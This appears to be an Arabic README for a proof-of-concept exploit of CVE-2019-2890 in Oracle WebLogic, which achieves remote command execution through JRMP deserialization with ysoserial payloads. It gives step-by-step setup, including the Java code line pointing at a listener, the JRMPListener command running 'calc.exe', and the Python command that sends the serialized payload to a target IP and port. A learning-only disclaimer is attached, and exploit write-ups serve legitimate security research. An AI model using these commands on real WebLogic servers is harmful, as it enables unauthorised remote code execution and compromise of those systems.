
استغلال PoC للثغرة CVE-2019-2890 يستهدف Oracle WebLogic، باستخدام إزالة تسلسل JRMP لتحقيق تنفيذ أوامر عن بُعد عبر حمولات ysoserial.
يُستخدم فقط لأغراض التعلم والتبادل، وتتحمل وحدك مسؤولية أي استخدام آخر.
تم استيراد ملفات jar ذات الصلة إلى المشروع، ويتم استخدام أسلوب الاستغلال yso's JRMP، ويمكن تعديل أسلوب الاستغلال أثناء التعلم والتصحيح.
أولاً، يجب وضع ملف SerializedSystemIni.dat من weblogic في مجلد security.
ثم يجب إعادة تسمية yso إلى ysoserial.jar واستيرادها إلى دليل lib.

ثانيًا، عنوان IP والمنفذ في getObject في ملف weblogic/wsee/jaxws/persistence/PersistentContext.java.
try {
var3.writeObject(Poc.getObject("127.0.0.1:8000"));
} catch (Exception e) {
e.printStackTrace();
}
أخيرًا، عن بعد عبر استماع JRMP، استخدم الأمر 7u21 للتنفيذ.
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
طريقة الاستخدام: قم بتشغيل Poc.java لإنشاء ملف التسلسل poc.ser، ثم عبر
python weblogic.py ip port poc.ser

